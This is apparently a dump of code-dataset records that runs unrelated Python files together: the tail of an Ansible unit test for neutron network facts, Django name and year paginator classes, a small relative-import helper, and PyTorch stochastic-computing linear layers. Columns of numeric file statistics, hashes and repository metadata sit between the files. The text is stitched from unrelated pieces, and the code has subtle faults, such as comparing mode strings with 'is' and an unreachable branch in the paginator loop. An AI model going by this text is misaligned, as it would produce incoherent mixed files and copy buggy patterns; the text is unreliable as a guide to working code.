"ansible_facts": {
"kolla_neutron_bridge_names": "breth0-ovs",
"kolla_neutron_external_interfaces": "p-breth0-ovs",
},
"_ansible_facts_cacheable": False,
}
self.assertEqual(expected, result)
def test_run_external_networks_bridge_vlan(self):
variables = copy.deepcopy(self.variables)
variables["foo_interface"] = "breth0.1"
variables["bar_interface"] = "breth0"
module = self._create_module(variables)
external_networks = [{
"network": "foo",
"required": False,
}]
result = module._run([], external_networks)
expected = {
"changed": False,
"ansible_facts": {
"kolla_neutron_bridge_names": "breth0-ovs",
"kolla_neutron_external_interfaces": "p-breth0-ovs",
},
"_ansible_facts_cacheable": False,
}
self.assertEqual(expected, result)
def test_run_external_networks_not_mapped(self):
module = self._create_module()
external_networks = [{
"network": "baz",
"required": True,
}]
result = module._run([], external_networks)
expected = {
"changed": False,
"failed": True,
"msg": ("Required external network 'baz' is not mapped to "
"this host"),
}
self.assertEqual(expected, result)
def test_run_external_networks_not_mapped_not_required(self):
module = self._create_module()
external_networks = [{
"network": "baz",
"required": False,
}]
result = module._run([], external_networks)
expected = {
"changed": False,
"ansible_facts": {},
"_ansible_facts_cacheable": False,
}
self.assertEqual(expected, result)
def test_run_external_networks_no_interface(self):
variables = copy.deepcopy(self.variables)
del variables["bar_interface"]
module = self._create_module(variables)
external_networks = [{
"network": "bar",
"required": True,
}]
result = module._run([], external_networks)
expected = {
"changed": False,
"failed": True,
"msg": ("Required external network 'bar' does not have an "
"interface configured for this host"),
}
self.assertEqual(expected, result)
def test_run_external_networks_no_interface_not_required(self):
variables = copy.deepcopy(self.variables)
del variables["bar_interface"]
module = self._create_module(variables)
external_networks = [{
"network": "bar",
"required": False,
}]
result = module._run([], external_networks)
expected = {
"changed": False,
"ansible_facts": {},
"_ansible_facts_cacheable": False,
}
self.assertEqual(expected, result)
def test_run_external_networks_not_mapped_no_interface(self):
variables = copy.deepcopy(self.variables)
del variables["bar_interface"]
module = self._create_module(variables)
external_networks = [{
"network": "baz",
"required": True,
}, {
"network": "bar",
"required": True,
}]
result = module._run([], external_networks)
expected = {
"changed": False,
"failed": True,
"msg": ("Required external network 'baz' is not mapped to "
"this host; Required external network 'bar' does not "
"have an interface configured for this host"),
}
self.assertEqual(expected, result)
| 33.026608
| 76
| 0.551326
| 1,364
| 14,895
| 5.741202
| 0.113636
| 0.067424
| 0.053378
| 0.056187
| 0.800664
| 0.797344
| 0.782786
| 0.775635
| 0.775635
| 0.753799
| 0
| 0.004534
| 0.333602
| 14,895
| 450
| 77
| 33.1
| 0.784405
| 0.037261
| 0
| 0.7175
| 0
| 0
| 0.225115
| 0.051585
| 0
| 0
| 0
| 0
| 0.05
| 1
| 0.065
| false
| 0
| 0.01
| 0.0075
| 0.095
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
43ef42922307dc7176868d049c72805c8ccffe39
| 7,165
|
py
|
Python
|
crossref/paginators.py
|
SSJenny90/django-publications
|
6ca302a6384c60cd161755fe6c757a4412101e99
|
[
"MIT"
] | null | null | null |
crossref/paginators.py
|
SSJenny90/django-publications
|
6ca302a6384c60cd161755fe6c757a4412101e99
|
[
"MIT"
] | null | null | null |
crossref/paginators.py
|
SSJenny90/django-publications
|
6ca302a6384c60cd161755fe6c757a4412101e99
|
[
"MIT"
] | null | null | null |
from django.core.paginator import InvalidPage
class NamePaginator(object):
"""Pagination for string-based objects"""
def __init__(self, object_list, on=None, per_page=25):
self.object_list = object_list
self.count = len(object_list)
self.pages = []
# chunk up the objects so we don't need to iterate over the whole list for each letter
chunks = {}
for obj in self.object_list:
if on:
obj_str = str(getattr(obj, on))
else:
obj_str = str(obj)
letter = str.upper(obj_str)
if letter not in chunks:
chunks[letter] = []
chunks[letter].append(obj)
# the process for assigning objects to each page
current_page = NamePage(self)
# nums = list(range(int(min(chunks.keys())),int(max(chunks.keys()))))
for num in chunks.keys():
num = str(num)
if num not in chunks:
current_page.add([], num)
continue
sub_list = chunks[num] # the items in object_list starting with this letter
new_page_count = len(sub_list) + current_page.count
# first, check to see if sub_list will fit or it needs to go onto a new page.
# if assigning this list will cause the page to overflow...
# and an underflow is closer to per_page than an overflow...
# and the page isn't empty (which means len(sub_list) > per_page)...
if new_page_count > per_page and \
abs(per_page - current_page.count) < abs(per_page - new_page_count) and \
current_page.count > 0:
# make a new page
self.pages.append(current_page)
current_page = NamePage(self)
current_page.add(sub_list, num)
# if we finished the for loop with a page that isn't empty, add it
if current_page.count > 0:
self.pages.append(current_page)
def page(self, num):
"""Returns a Page object for the given 1-based page number."""
if len(self.pages) == 0:
return None
elif num > 0 and num <= len(self.pages):
return self.pages[num-1]
else:
raise InvalidPage
@property
def num_pages(self):
"""Returns the total number of pages"""
return len(self.pages)
class NamePage(object):
def __init__(self, paginator):
self.paginator = paginator
self.object_list = []
self.letters = []
@property
def count(self):
return len(self.object_list)
@property
def start_letter(self):
if len(self.letters) > 0:
self.letters.sort(key=str.upper)
return self.letters[0]
else: return None
@property
def end_letter(self):
if len(self.letters) > 0:
self.letters.sort(key=str.upper)
return self.letters[-1]
else: return None
@property
def number(self):
return self.paginator.pages.index(self) + 1
def add(self, new_list, letter=None):
if len(new_list) > 0:
self.object_list = self.object_list + new_list
if letter:
self.letters.append(letter)
def __repr__(self):
if self.start_letter == self.end_letter:
return str(self.start_letter)
else:
return f'{self.start_letter}-{self.end_letter}'
class YearPaginator(object):
"""Pagination for date-based objects"""
def __init__(self, object_list, on=None, per_page=25):
self.object_list = object_list
self.count = object_list.count()
self.pages = []
# chunk up the objects so we don't need to iterate over the whole list for each letter
chunks = {}
for obj in self.object_list:
for x in on.split('__'):
letter = getattr(obj, x)
if letter not in chunks:
chunks[letter] = []
chunks[letter].append(obj)
# the process for assigning objects to each page
current_page = YearPage(self)
# nums = list(range(int(min(chunks.keys())),int(max(chunks.keys()))))
for num in chunks.keys():
if num not in chunks:
current_page.add([], num)
continue
sub_list = chunks[num] # the items in object_list starting with this letter
new_page_count = len(sub_list) + current_page.count
# first, check to see if sub_list will fit or it needs to go onto a new page.
# if assigning this list will cause the page to overflow...
# and an underflow is closer to per_page than an overflow...
# and the page isn't empty (which means len(sub_list) > per_page)...
if new_page_count > per_page and \
abs(per_page - current_page.count) < abs(per_page - new_page_count) and \
current_page.count > 0:
# make a new page
self.pages.append(current_page)
current_page = YearPage(self)
current_page.add(sub_list, num)
# if we finished the for loop with a page that isn't empty, add it
if current_page.count > 0:
self.pages.append(current_page)
def page(self, num):
"""Returns a Page object for the given 1-based page number."""
if len(self.pages) == 0:
return None
elif num > 0 and num <= len(self.pages):
return self.pages[num-1]
else:
raise InvalidPage
@property
def num_pages(self):
"""Returns the total number of pages"""
return len(self.pages)
class YearPage(object):
def __init__(self, paginator):
self.paginator = paginator
self.object_list = []
self.letters = []
@property
def count(self):
return len(self.object_list)
@property
def start_letter(self):
if len(self.letters) > 0:
# self.letters.sort(key=str.upper)
return self.letters[0]
else: return None
@property
def end_letter(self):
if len(self.letters) > 0:
# self.letters.sort(key=str.upper)
return self.letters[-1]
else: return None
@property
def number(self):
return self.paginator.pages.index(self) + 1
def add(self, new_list, letter=None):
if len(new_list) > 0:
self.object_list = self.object_list + new_list
if letter:
self.letters.append(letter)
def __repr__(self):
if self.start_letter == self.end_letter:
return str(self.start_letter)
else:
return f'{self.end_letter}-{self.start_letter}'
| 32.568182
| 94
| 0.547802
| 896
| 7,165
| 4.241071
| 0.135045
| 0.052632
| 0.051579
| 0.017895
| 0.923158
| 0.914737
| 0.908421
| 0.908421
| 0.908421
| 0.908421
| 0
| 0.006132
| 0.362736
| 7,165
| 220
| 95
| 32.568182
| 0.826106
| 0.20963
| 0
| 0.888112
| 0
| 0
| 0.013542
| 0.013186
| 0
| 0
| 0
| 0
| 0
| 1
| 0.13986
| false
| 0
| 0.006993
| 0.027972
| 0.300699
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a10a48b14362db67789974efa63c236cc30ed241
| 69
|
py
|
Python
|
tests/tests_unit/test_api/relative_imports/bad_relative_import.py
|
AlexThunder/cognite-sdk-python-experimental
|
468d29e7809793ed45cef5da25dca22418839972
|
[
"Apache-2.0"
] | null | null | null |
tests/tests_unit/test_api/relative_imports/bad_relative_import.py
|
AlexThunder/cognite-sdk-python-experimental
|
468d29e7809793ed45cef5da25dca22418839972
|
[
"Apache-2.0"
] | null | null | null |
tests/tests_unit/test_api/relative_imports/bad_relative_import.py
|
AlexThunder/cognite-sdk-python-experimental
|
468d29e7809793ed45cef5da25dca22418839972
|
[
"Apache-2.0"
] | null | null | null |
from .util import local_func
def handle():
return local_func()
| 11.5
| 28
| 0.710145
| 10
| 69
| 4.7
| 0.8
| 0.382979
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.202899
| 69
| 5
| 29
| 13.8
| 0.854545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
a19e724b69f9674dac3392aa6ae485efccdb86dd
| 25,639
|
py
|
Python
|
sw/kernel/linear.py
|
libingzheren/UnarySim
|
226c46a4ddce2fbb71395e8fd8decff768dc3742
|
[
"MIT"
] | 1
|
2021-08-04T10:33:06.000Z
|
2021-08-04T10:33:06.000Z
|
sw/kernel/linear.py
|
libingzheren/Stochastic_Computing
|
c02461454618e9ce0c86ce695fad9e95d1ca5e00
|
[
"MIT"
] | null | null | null |
sw/kernel/linear.py
|
libingzheren/Stochastic_Computing
|
c02461454618e9ce0c86ce695fad9e95d1ca5e00
|
[
"MIT"
] | null | null | null |
import torch
import math
from UnarySim.sw.stream.gen import RNG, RNGMulti, SourceGen, BSGen, BSGenMulti
class UnaryLinear(torch.nn.Module):
"""
this module is the fully connected layer,
its API is similar to the parent class (input/output feature count, bias flag), except:
1) accumulation mode
2) unary data mode
3) binary data width
4) binary weight
5) binary bias
"""
def __init__(self,
in_features,
out_features,
binary_weight=None,
binary_bias=None,
bitwidth=8,
bias=True,
mode="bipolar",
scaled=True,
btype=torch.float,
rtype=torch.float,
stype=torch.float):
super(UnaryLinear, self).__init__()
self.in_features = in_features
self.out_features = out_features
self.stype = stype
self.btype = btype
self.rtype = rtype
# upper bound for accumulation counter in scaled mode
self.acc_bound = torch.nn.Parameter(torch.zeros(1), requires_grad=False)
self.acc_bound.add_(in_features)
if bias is True:
self.acc_bound.add_(1)
self.mode = mode
self.scaled = scaled
# accumulation offset
self.offset = torch.nn.Parameter(torch.zeros(1), requires_grad=False)
if mode is "unipolar":
pass
elif mode is "bipolar":
self.offset.add_((in_features-1)/2)
if bias is True:
self.offset.add_(1/2)
else:
raise ValueError("UnaryLinear mode is not implemented.")
# bias indication for original linear layer
self.has_bias = bias
# data bit width
self.bitwidth = bitwidth
# random_sequence from sobol RNG
self.rng = RNG(self.bitwidth, 1, "Sobol")()
# define the convolution weight and bias
self.buf_wght = SourceGen(binary_weight, bitwidth=self.bitwidth, mode=mode, rtype=rtype)()
if self.has_bias is True:
self.buf_bias = SourceGen(binary_bias, bitwidth=self.bitwidth, mode=mode, rtype=rtype)()
# define the kernel linear
self.kernel = torch.nn.Linear(self.in_features, self.out_features, bias=self.has_bias)
self.buf_wght_bs = BSGen(self.buf_wght, self.rng, stype=stype)
self.rng_wght_idx = torch.nn.Parameter(torch.zeros_like(self.kernel.weight, dtype=torch.long), requires_grad=False)
if self.has_bias is True:
self.buf_bias_bs = BSGen(self.buf_bias, self.rng, stype=stype)
self.rng_bias_idx = torch.nn.Parameter(torch.zeros_like(self.kernel.bias, dtype=torch.long), requires_grad=False)
# if bipolar, define a kernel with inverse input, note that there is no bias required for this inverse kernel
if self.mode is "bipolar":
self.kernel_inv = torch.nn.Linear(self.in_features, self.out_features, bias=False)
self.buf_wght_bs_inv = BSGen(self.buf_wght, self.rng, stype=stype)
self.rng_wght_idx_inv = torch.nn.Parameter(torch.zeros_like(self.kernel_inv.weight, dtype=torch.long), requires_grad=False)
self.accumulator = torch.nn.Parameter(torch.zeros(1), requires_grad=False)
if self.scaled is False:
self.out_accumulator = torch.nn.Parameter(torch.zeros(1), requires_grad=False)
def UnaryKernel_accumulation(self, input):
# generate weight and bias bits for current cycle
self.kernel.weight.data = self.buf_wght_bs(self.rng_wght_idx).type(torch.float)
self.rng_wght_idx.add_(input.type(torch.long))
if self.has_bias is True:
self.kernel.bias.data = self.buf_bias_bs(self.rng_bias_idx).type(torch.float)
self.rng_bias_idx.add_(1)
kernel_out = self.kernel(input.type(torch.float))
if self.mode is "unipolar":
return kernel_out
if self.mode is "bipolar":
self.kernel_inv.weight.data = 1 - self.buf_wght_bs_inv(self.rng_wght_idx_inv).type(torch.float)
self.rng_wght_idx_inv.add_(1 - input.type(torch.long))
kernel_out_inv = self.kernel_inv(1 - input.type(torch.float))
return kernel_out + kernel_out_inv
def forward(self, input):
kernel_out_total = self.UnaryKernel_accumulation(input)
self.accumulator.data = self.accumulator.add(kernel_out_total)
if self.scaled is True:
output = torch.ge(self.accumulator, self.acc_bound).type(torch.float)
self.accumulator.sub_(output * self.acc_bound)
else:
self.accumulator.sub_(self.offset)
output = torch.gt(self.accumulator, self.out_accumulator).type(torch.float)
self.out_accumulator.data = self.out_accumulator.add(output)
return output.type(self.stype)
class GainesLinear1(torch.nn.Module):
"""
gMUL + gADD
this module is the fully connected layer,
its API is similar to the parent class (input/output feature count, bias flag), except:
1) accumulation mode
2) unary data mode
3) binary data width
4) binary weight
5) binary bias
"""
def __init__(self,
in_features,
out_features,
binary_weight=None,
binary_bias=None,
bitwidth=8,
bias=True,
mode="bipolar",
scaled=True,
depth=8,
rng_idx=1):
super(GainesLinear1, self).__init__()
self.in_features = in_features
self.out_features = out_features
# upper bound for accumulation counter in non-scaled mode
self.acc_bound = torch.nn.Parameter(torch.zeros(1), requires_grad=False)
self.acc_bound.add_(in_features)
if bias is True:
self.acc_bound.add_(1)
self.mode = mode
self.scaled = scaled
# accumulation offset
self.offset = torch.nn.Parameter(torch.zeros(1), requires_grad=False)
if mode is "unipolar":
pass
elif mode is "bipolar":
self.offset.add_((in_features-1)/2)
if bias is True:
self.offset.add_(1/2)
else:
raise ValueError("UnaryLinear mode is not implemented.")
# bias indication for original linear layer
self.has_bias = bias
# data bit width
self.bitwidth = bitwidth
# random_sequence from sobol RNG
self.rng = RNGMulti(self.bitwidth, in_features, "Sobol")()
self.rng_bias = RNG(self.bitwidth, in_features+1, "Sobol")()
# define the convolution weight and bias
self.buf_wght = SourceGen(binary_weight, bitwidth=self.bitwidth, mode=mode)()
if self.has_bias is True:
self.buf_bias = SourceGen(binary_bias, bitwidth=self.bitwidth, mode=mode)()
# define the kernel linear
self.kernel = torch.nn.Linear(self.in_features, self.out_features, bias=self.has_bias)
self.buf_wght_bs = BSGenMulti(self.buf_wght, self.rng, dim=0)
self.rng_wght_idx = torch.nn.Parameter(torch.zeros_like(self.kernel.weight, dtype=torch.long), requires_grad=False)
if self.has_bias is True:
self.buf_bias_bs = BSGen(self.buf_bias, self.rng_bias)
self.rng_bias_idx = torch.nn.Parameter(torch.zeros_like(self.kernel.bias, dtype=torch.long), requires_grad=False)
# if bipolar, define a kernel with inverse input, note that there is no bias required for this inverse kernel
if self.mode is "bipolar":
self.kernel_inv = torch.nn.Linear(self.in_features, self.out_features, bias=False)
self.parallel_cnt = torch.nn.Parameter(torch.zeros(1, dtype=torch.long), requires_grad=False)
if self.scaled is True:
self.rng_scale = RNG(round(math.log2(self.acc_bound.item())), (rng_idx+5)%1111, "Sobol")()
self.rng_scale_idx = torch.nn.Parameter(torch.zeros(1, dtype=torch.long), requires_grad=False)
elif self.scaled is False:
self.input_cnt = self.acc_bound.item()
self.max = torch.nn.Parameter(torch.ones(1, dtype=torch.long).fill_(2**depth-1), requires_grad=False)
self.half_max = torch.nn.Parameter(torch.ones(1, dtype=torch.long).fill_(2**(depth-1)), requires_grad=False)
self.cnt = torch.nn.Parameter(torch.zeros(1, dtype=torch.long).fill_(2**(depth-1)), requires_grad=False)
def GainesKernel_accumulation(self, input):
# generate weight and bias bits for current cycle
self.kernel.weight.data = self.buf_wght_bs(self.rng_wght_idx).type(torch.float)
self.rng_wght_idx.add_(1)
if self.has_bias is True:
self.kernel.bias.data = self.buf_bias_bs(self.rng_bias_idx).type(torch.float)
self.rng_bias_idx.add_(1)
kernel_out = self.kernel(input.type(torch.float))
if self.mode is "unipolar":
return kernel_out
if self.mode is "bipolar":
self.kernel_inv.weight.data = 1 - self.kernel.weight.data
kernel_out_inv = self.kernel_inv(1 - input.type(torch.float))
return kernel_out + kernel_out_inv
def forward(self, input):
self.parallel_cnt.data = self.GainesKernel_accumulation(input).type(torch.long)
if self.scaled is True:
output = torch.ge(self.parallel_cnt.data, self.rng_scale[self.rng_scale_idx%len(self.rng_scale)])
self.rng_scale_idx.add_(1)
else:
if self.mode is "unipolar":
output = torch.gt(self.parallel_cnt, 0)
elif self.mode is "bipolar":
self.parallel_cnt.mul_(2).sub_(self.input_cnt)
self.cnt.data = self.cnt.add(self.parallel_cnt).clamp(0, self.max.item())
output = torch.gt(self.cnt, self.half_max)
return output.type(torch.int8)
class GainesLinear2(torch.nn.Module):
"""
gMUL + uADD
this module is the fully connected layer,
its API is similar to the parent class (input/output feature count, bias flag), except:
1) accumulation mode
2) unary data mode
3) binary data width
4) binary weight
5) binary bias
"""
def __init__(self,
in_features,
out_features,
binary_weight=None,
binary_bias=None,
bitwidth=8,
bias=True,
mode="bipolar",
scaled=True,
depth=8,
rng_idx=1):
super(GainesLinear2, self).__init__()
self.in_features = in_features
self.out_features = out_features
# upper bound for accumulation counter in non-scaled mode
self.acc_bound = torch.nn.Parameter(torch.zeros(1), requires_grad=False)
self.acc_bound.add_(in_features)
if bias is True:
self.acc_bound.add_(1)
self.mode = mode
self.scaled = scaled
# accumulation offset
self.offset = torch.nn.Parameter(torch.zeros(1), requires_grad=False)
if mode is "unipolar":
pass
elif mode is "bipolar":
self.offset.add_((in_features-1)/2)
if bias is True:
self.offset.add_(1/2)
else:
raise ValueError("UnaryLinear mode is not implemented.")
# bias indication for original linear layer
self.has_bias = bias
# data bit width
self.bitwidth = bitwidth
# random_sequence from sobol RNG
self.rng = RNGMulti(self.bitwidth, in_features, "Sobol")()
self.rng_bias = RNG(self.bitwidth, in_features+1, "Sobol")()
# define the convolution weight and bias
self.buf_wght = SourceGen(binary_weight, bitwidth=self.bitwidth, mode=mode)()
if self.has_bias is True:
self.buf_bias = SourceGen(binary_bias, bitwidth=self.bitwidth, mode=mode)()
# define the kernel linear
self.kernel = torch.nn.Linear(self.in_features, self.out_features, bias=self.has_bias)
self.buf_wght_bs = BSGenMulti(self.buf_wght, self.rng, dim=0)
self.rng_wght_idx = torch.nn.Parameter(torch.zeros_like(self.kernel.weight, dtype=torch.long), requires_grad=False)
if self.has_bias is True:
self.buf_bias_bs = BSGen(self.buf_bias, self.rng_bias)
self.rng_bias_idx = torch.nn.Parameter(torch.zeros_like(self.kernel.bias, dtype=torch.long), requires_grad=False)
# if bipolar, define a kernel with inverse input, note that there is no bias required for this inverse kernel
if self.mode is "bipolar":
self.kernel_inv = torch.nn.Linear(self.in_features, self.out_features, bias=False)
self.accumulator = torch.nn.Parameter(torch.zeros(1), requires_grad=False)
if self.scaled is False:
self.out_accumulator = torch.nn.Parameter(torch.zeros(1), requires_grad=False)
def GainesKernel_accumulation(self, input):
# generate weight and bias bits for current cycle
self.kernel.weight.data = self.buf_wght_bs(self.rng_wght_idx).type(torch.float)
self.rng_wght_idx.add_(1)
if self.has_bias is True:
self.kernel.bias.data = self.buf_bias_bs(self.rng_bias_idx).type(torch.float)
self.rng_bias_idx.add_(1)
kernel_out = self.kernel(input.type(torch.float))
if self.mode is "unipolar":
return kernel_out
if self.mode is "bipolar":
self.kernel_inv.weight.data = 1 - self.kernel.weight.data
kernel_out_inv = self.kernel_inv(1 - input.type(torch.float))
return kernel_out + kernel_out_inv
def forward(self, input):
if self.scaled is True:
self.accumulator.data = self.accumulator.add(self.GainesKernel_accumulation(input))
output = torch.ge(self.accumulator, self.acc_bound).type(torch.float)
self.accumulator.sub_(output * self.acc_bound)
else:
self.accumulator.data = self.accumulator.add(self.GainesKernel_accumulation(input))
self.accumulator.sub_(self.offset)
output = torch.gt(self.accumulator, self.out_accumulator).type(torch.float)
self.out_accumulator.data = self.out_accumulator.add(output)
return output.type(torch.int8)
class GainesLinear3(torch.nn.Module):
"""
uMUL + gADD: this version will not work well, due to same rng is used in uMUL, the accumulation
will be inaccurate.
this module is the fully connected layer,
its API is similar to the parent class (input/output feature count, bias flag), except:
1) accumulation mode
2) unary data mode
3) binary data width
4) binary weight
5) binary bias
"""
def __init__(self,
in_features,
out_features,
binary_weight=None,
binary_bias=None,
bitwidth=8,
bias=True,
mode="bipolar",
scaled=True,
depth=8,
rng_idx=1):
super(GainesLinear3, self).__init__()
self.in_features = in_features
self.out_features = out_features
# upper bound for accumulation counter in non-scaled mode
self.acc_bound = torch.nn.Parameter(torch.zeros(1), requires_grad=False)
self.acc_bound.add_(in_features)
if bias is True:
self.acc_bound.add_(1)
self.mode = mode
self.scaled = scaled
# accumulation offset
self.offset = torch.nn.Parameter(torch.zeros(1), requires_grad=False)
if mode is "unipolar":
pass
elif mode is "bipolar":
self.offset.add_((in_features-1)/2)
if bias is True:
self.offset.add_(1/2)
else:
raise ValueError("UnaryLinear mode is not implemented.")
# bias indication for original linear layer
self.has_bias = bias
# data bit width
self.bitwidth = bitwidth
# random_sequence from sobol RNG
self.rng = RNG(self.bitwidth, 1, "Sobol")()
# define the convolution weight and bias
self.buf_wght = SourceGen(binary_weight, bitwidth=self.bitwidth, mode=mode)()
if self.has_bias is True:
self.buf_bias = SourceGen(binary_bias, bitwidth=self.bitwidth, mode=mode)()
# define the kernel linear
self.kernel = torch.nn.Linear(self.in_features, self.out_features, bias=self.has_bias)
self.buf_wght_bs = BSGen(self.buf_wght, self.rng)
self.rng_wght_idx = torch.nn.Parameter(torch.zeros_like(self.kernel.weight, dtype=torch.long), requires_grad=False)
if self.has_bias is True:
self.buf_bias_bs = BSGen(self.buf_bias, self.rng)
self.rng_bias_idx = torch.nn.Parameter(torch.zeros_like(self.kernel.bias, dtype=torch.long), requires_grad=False)
# if bipolar, define a kernel with inverse input, note that there is no bias required for this inverse kernel
if self.mode is "bipolar":
self.kernel_inv = torch.nn.Linear(self.in_features, self.out_features, bias=False)
self.buf_wght_bs_inv = BSGen(self.buf_wght, self.rng)
self.rng_wght_idx_inv = torch.nn.Parameter(torch.zeros_like(self.kernel_inv.weight, dtype=torch.long), requires_grad=False)
self.parallel_cnt = torch.nn.Parameter(torch.zeros(1, dtype=torch.long), requires_grad=False)
if self.scaled is True:
self.rng_scale = RNG(round(math.log2(self.acc_bound.item())), (rng_idx+5)%1111, "Sobol")()
self.rng_scale_idx = torch.nn.Parameter(torch.zeros(1, dtype=torch.long), requires_grad=False)
elif self.scaled is False:
self.input_cnt = self.acc_bound.item()
self.max = torch.nn.Parameter(torch.ones(1, dtype=torch.long).fill_(2**depth-1), requires_grad=False)
self.half_max = torch.nn.Parameter(torch.ones(1, dtype=torch.long).fill_(2**(depth-1)), requires_grad=False)
self.cnt = torch.nn.Parameter(torch.zeros(1, dtype=torch.long).fill_(2**(depth-1)), requires_grad=False)
def UnaryKernel_accumulation(self, input):
# generate weight and bias bits for current cycle
self.kernel.weight.data = self.buf_wght_bs(self.rng_wght_idx).type(torch.float)
self.rng_wght_idx.add_(input.type(torch.long))
if self.has_bias is True:
self.kernel.bias.data = self.buf_bias_bs(self.rng_bias_idx).type(torch.float)
self.rng_bias_idx.add_(1)
kernel_out = self.kernel(input.type(torch.float))
if self.mode is "unipolar":
return kernel_out
if self.mode is "bipolar":
self.kernel_inv.weight.data = 1 - self.buf_wght_bs_inv(self.rng_wght_idx_inv).type(torch.float)
self.rng_wght_idx_inv.add_(1 - input.type(torch.long))
kernel_out_inv = self.kernel_inv(1 - input.type(torch.float))
return kernel_out + kernel_out_inv
def forward(self, input):
self.parallel_cnt.data = self.UnaryKernel_accumulation(input).type(torch.long)
if self.scaled is True:
output = torch.ge(self.parallel_cnt.data, self.rng_scale[self.rng_scale_idx%len(self.rng_scale)])
self.rng_scale_idx.add_(1)
else:
if self.mode is "unipolar":
output = torch.gt(self.parallel_cnt, 0)
elif self.mode is "bipolar":
self.parallel_cnt.mul_(2).sub_(self.input_cnt)
self.cnt.data = self.cnt.add(self.parallel_cnt).clamp(0, self.max.item())
output = torch.gt(self.cnt, self.half_max)
return output.type(torch.int8)
class GainesLinear4(torch.nn.Module):
"""
gMUL + gADD,
this module is the same as GainesLinear1, except the rng is lfsr
this module is the fully connected layer,
its API is similar to the parent class (input/output feature count, bias flag), except:
1) accumulation mode
2) unary data mode
3) binary data width
4) binary weight
5) binary bias
"""
def __init__(self,
in_features,
out_features,
binary_weight=None,
binary_bias=None,
bitwidth=8,
bias=True,
mode="bipolar",
scaled=True,
depth=8,
rng_idx=1):
super(GainesLinear4, self).__init__()
self.in_features = in_features
self.out_features = out_features
# upper bound for accumulation counter in non-scaled mode
self.acc_bound = torch.nn.Parameter(torch.zeros(1), requires_grad=False)
self.acc_bound.add_(in_features)
if bias is True:
self.acc_bound.add_(1)
self.mode = mode
self.scaled = scaled
# accumulation offset
self.offset = torch.nn.Parameter(torch.zeros(1), requires_grad=False)
if mode is "unipolar":
pass
elif mode is "bipolar":
self.offset.add_((in_features-1)/2)
if bias is True:
self.offset.add_(1/2)
else:
raise ValueError("UnaryLinear mode is not implemented.")
# bias indication for original linear layer
self.has_bias = bias
# data bit width
self.bitwidth = bitwidth
# random_sequence from sobol RNG
self.rng = RNGMulti(self.bitwidth, in_features, "LFSR")()
self.rng_bias = RNG(self.bitwidth, in_features+1, "LFSR")()
# define the convolution weight and bias
self.buf_wght = SourceGen(binary_weight, bitwidth=self.bitwidth, mode=mode)()
if self.has_bias is True:
self.buf_bias = SourceGen(binary_bias, bitwidth=self.bitwidth, mode=mode)()
# define the kernel linear
self.kernel = torch.nn.Linear(self.in_features, self.out_features, bias=self.has_bias)
self.buf_wght_bs = BSGenMulti(self.buf_wght, self.rng, dim=0)
self.rng_wght_idx = torch.nn.Parameter(torch.zeros_like(self.kernel.weight, dtype=torch.long), requires_grad=False)
if self.has_bias is True:
self.buf_bias_bs = BSGen(self.buf_bias, self.rng_bias)
self.rng_bias_idx = torch.nn.Parameter(torch.zeros_like(self.kernel.bias, dtype=torch.long), requires_grad=False)
# if bipolar, define a kernel with inverse input, note that there is no bias required for this inverse kernel
if self.mode is "bipolar":
self.kernel_inv = torch.nn.Linear(self.in_features, self.out_features, bias=False)
self.parallel_cnt = torch.nn.Parameter(torch.zeros(1, dtype=torch.long), requires_grad=False)
if self.scaled is True:
self.rng_scale = RNG(round(math.log2(self.acc_bound.item())), (rng_idx+5)%1111, "LFSR")()
self.rng_scale_idx = torch.nn.Parameter(torch.zeros(1, dtype=torch.long), requires_grad=False)
elif self.scaled is False:
self.input_cnt = self.acc_bound.item()
self.max = torch.nn.Parameter(torch.ones(1, dtype=torch.long).fill_(2**depth-1), requires_grad=False)
self.half_max = torch.nn.Parameter(torch.ones(1, dtype=torch.long).fill_(2**(depth-1)), requires_grad=False)
self.cnt = torch.nn.Parameter(torch.zeros(1, dtype=torch.long).fill_(2**(depth-1)), requires_grad=False)
def GainesKernel_accumulation(self, input):
# generate weight and bias bits for current cycle
self.kernel.weight.data = self.buf_wght_bs(self.rng_wght_idx).type(torch.float)
self.rng_wght_idx.add_(1)
if self.has_bias is True:
self.kernel.bias.data = self.buf_bias_bs(self.rng_bias_idx).type(torch.float)
self.rng_bias_idx.add_(1)
kernel_out = self.kernel(input.type(torch.float))
if self.mode is "unipolar":
return kernel_out
if self.mode is "bipolar":
self.kernel_inv.weight.data = 1 - self.kernel.weight.data
kernel_out_inv = self.kernel_inv(1 - input.type(torch.float))
return kernel_out + kernel_out_inv
def forward(self, input):
self.parallel_cnt.data = self.GainesKernel_accumulation(input).type(torch.long)
if self.scaled is True:
output = torch.ge(self.parallel_cnt.data, self.rng_scale[self.rng_scale_idx%len(self.rng_scale)])
self.rng_scale_idx.add_(1)
else:
if self.mode is "unipolar":
output = torch.gt(self.parallel_cnt, 0)
elif self.mode is "bipolar":
self.parallel_cnt.mul_(2).sub_(self.input_cnt)
self.cnt.data = self.cnt.add(self.parallel_cnt).clamp(0, self.max.item())
output = torch.gt(self.cnt, self.half_max)
return output.type(torch.int8)
| 43.75256
| 135
| 0.618355
| 3,407
| 25,639
| 4.481655
| 0.04843
| 0.033925
| 0.042963
| 0.056389
| 0.962146
| 0.962146
| 0.954745
| 0.953435
| 0.953435
| 0.9461
| 0
| 0.009836
| 0.282304
| 25,639
| 586
| 136
| 43.75256
| 0.819955
| 0.126721
| 0
| 0.913924
